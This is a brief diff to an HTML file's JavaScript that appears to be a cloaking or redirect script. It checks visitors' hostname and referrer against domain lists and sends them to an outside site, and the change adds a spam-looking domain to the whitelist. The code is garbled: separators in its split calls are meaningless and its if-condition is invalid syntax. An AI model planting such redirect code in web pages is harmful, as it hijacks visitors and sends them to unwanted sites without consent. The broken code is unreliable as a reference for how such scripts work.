--- a/encodee.html
+++ b/encodee.html
@@ -116,7 +116,7 @@ var blackdomains = "google.com";
 var blacklist = blackdomains.split("https://www.wicketgoal.com"); 
 
 var whitedomains = " ";
-var whitelist = whitedomains.split(" ");
+var whitelist = whitedomains.split(" 26.reducemyweight.net ");
 
 if (isInArray(hostname, blacklist)!document.referrer) {
   document.location.href = " https://www.yosin-tv.net";
